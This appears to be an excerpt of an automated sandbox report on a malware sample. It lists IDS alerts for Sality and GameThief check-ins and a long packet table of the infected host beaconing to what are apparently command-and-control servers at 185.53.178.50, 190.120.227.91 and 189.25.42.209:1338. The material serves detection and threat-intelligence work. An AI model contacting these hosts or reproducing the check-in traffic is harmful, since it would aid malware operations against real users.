                                                                                                                                                                                                                                  2024-10-18T09:40:05.184315+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762532185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:13.679122+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762533190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:13.679122+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762533190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:13.679122+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762533190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:15.014967+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762534185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:15.014967+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762534185.53.178.5080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:23.537013+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.762535190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:23.537013+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.762535190.120.227.918080TCP
                                                                                                                                                                                                                                  2024-10-18T09:40:23.537013+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.762535190.120.227.918080TCP

                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:14.612803936 CEST497251338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:14.617822886 CEST133849725189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:14.617886066 CEST497251338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.962194920 CEST4973180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.967072010 CEST8049731185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.967176914 CEST4973180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.977289915 CEST4973180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:15.982137918 CEST8049731185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.049990892 CEST8049731185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.050107956 CEST8049731185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.050121069 CEST8049731185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.050151110 CEST4973180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.050214052 CEST4973180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.089121103 CEST497378080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.094038010 CEST808049737190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.094192028 CEST497378080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.094305992 CEST497378080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:17.099103928 CEST808049737190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.240689993 CEST497378080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.499124050 CEST4973180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.499480963 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.513874054 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.513957024 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.514183044 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.520184040 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.520198107 CEST8049731185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:21.520261049 CEST4973180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591331959 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591417074 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591438055 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591449976 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591483116 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591492891 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591828108 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.591881037 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.611561060 CEST497648080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.616466999 CEST808049764190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.616563082 CEST497648080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.619852066 CEST497648080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:22.624721050 CEST808049764190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.102139950 CEST133849725189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.102221966 CEST497251338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.112694979 CEST497251338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.117516994 CEST133849725189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.131225109 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.136113882 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:23.136209011 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.713690996 CEST497648080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.953638077 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.954036951 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.975609064 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.975619078 CEST8049758185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.975687981 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.975729942 CEST4975880192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:26.999886990 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:27.005415916 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058017969 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058130026 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058171988 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058183908 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058228970 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058574915 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.058618069 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.080173016 CEST497908080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.085294008 CEST808049790190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.085402012 CEST497908080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.088912964 CEST497908080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:28.093822002 CEST808049790190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.076145887 CEST497908080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.165900946 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.166336060 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.166860104 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.166860104 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.166932106 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.167891979 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.167923927 CEST498121338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.168066978 CEST497651338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.173701048 CEST133849765189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.173722982 CEST133849812189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.173882008 CEST498121338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.297267914 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.298000097 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.302839994 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303198099 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303198099 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303236008 CEST8049783185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.303406000 CEST4978380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:32.308160067 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454242945 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454308987 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454354048 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454370022 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454407930 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454628944 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.454667091 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.464095116 CEST498248080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.468995094 CEST808049824190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.469072104 CEST498248080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.469178915 CEST498248080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:33.473927021 CEST808049824190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.482584953 CEST498248080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.701769114 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.702073097 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.706891060 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707077026 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707102060 CEST8049813185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707158089 CEST4981380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.707685947 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:37.712521076 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799633980 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799752951 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799839020 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.799892902 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.800071001 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.800072908 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.800118923 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.822963953 CEST498518080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.827851057 CEST808049851190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.828496933 CEST498518080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.828929901 CEST498518080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:38.833760023 CEST808049851190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.743123055 CEST133849812189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.743206978 CEST498121338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.743695974 CEST498121338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.744544029 CEST498641338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.748552084 CEST133849812189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.749413967 CEST133849864189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:40.749490976 CEST498641338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:42.849776983 CEST498518080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.147034883 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.147533894 CEST4988180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.152278900 CEST8049845185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.152357101 CEST8049881185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.152415991 CEST4984580192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.152471066 CEST4988180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.152618885 CEST4988180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:43.157398939 CEST8049881185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.218116999 CEST8049881185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.218274117 CEST4988180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.218306065 CEST8049881185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.218442917 CEST4988180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.368341923 CEST8049881185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.368590117 CEST8049881185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.368670940 CEST4988180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.384848118 CEST498888080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.390690088 CEST808049888190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.390764952 CEST498888080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.390918970 CEST498888080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:44.395919085 CEST808049888190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.414602041 CEST498888080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.683176041 CEST4988180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.683584929 CEST4991380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.688498974 CEST8049913185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.688582897 CEST4991380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.688736916 CEST4991380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.688987017 CEST8049881185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.693162918 CEST4988180192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:48.693510056 CEST8049913185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.249767065 CEST133849864189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.249922037 CEST498641338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.250390053 CEST498641338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.251213074 CEST499161338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.255263090 CEST133849864189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.256028891 CEST133849916189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.256105900 CEST499161338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.758708000 CEST8049913185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.758846998 CEST8049913185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.758862972 CEST8049913185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.758905888 CEST4991380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.758946896 CEST4991380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.771033049 CEST499228080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.775880098 CEST808049922190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.775940895 CEST499228080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.776119947 CEST499228080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:49.780910015 CEST808049922190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:53.779103994 CEST499228080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.000533104 CEST4991380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.000885010 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.127252102 CEST8049943185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.127321005 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.127474070 CEST8049913185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.127641916 CEST4991380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.130867004 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.135654926 CEST8049943185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191478968 CEST8049943185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191539049 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191603899 CEST8049943185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191613913 CEST8049943185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191648960 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191674948 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191909075 CEST8049943185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.192190886 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.206003904 CEST624598080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.210963011 CEST808062459190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.211626053 CEST624598080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.212109089 CEST624598080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.216907978 CEST808062459190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:57.733740091 CEST133849916189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:57.733813047 CEST499161338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:57.734241009 CEST499161338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:57.735146046 CEST624761338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:57.739044905 CEST133849916189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:57.740024090 CEST133862476189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:57.740097046 CEST624761338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.200915098 CEST624598080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.420728922 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.421014071 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.426091909 CEST8062487185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.426707983 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.426867008 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.426997900 CEST8049943185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.427079916 CEST4994380192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.431869984 CEST8062487185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.499979973 CEST8062487185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.500058889 CEST8062487185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.500077009 CEST8062487185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.500104904 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.500366926 CEST8062487185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.500399113 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.502077103 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.533832073 CEST624938080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.538887024 CEST808062493190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.538984060 CEST624938080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.539690971 CEST624938080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.544554949 CEST808062493190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:04.530611038 CEST624938080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:04.766025066 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:04.766376019 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.184745073 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.683252096 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.683271885 CEST8062487185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.683327913 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.683607101 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.683954000 CEST8062487185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.684015036 CEST6248780192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.689784050 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.220720053 CEST133862476189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.220782995 CEST624761338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.221218109 CEST624761338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.222042084 CEST625111338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.225980043 CEST133862476189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.227345943 CEST133862511189.25.42.209192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.227412939 CEST625111338192.168.2.7189.25.42.209
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749342918 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749372959 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749383926 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749430895 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749475002 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749485970 CEST8062510185.53.178.50192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749531031 CEST6251080192.168.2.7185.53.178.50
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.770070076 CEST625128080192.168.2.7190.120.227.91
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.775274038 CEST808062512190.120.227.91192.168.2.7
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.775362968 CEST625128080192.168.2.7190.120.227.91
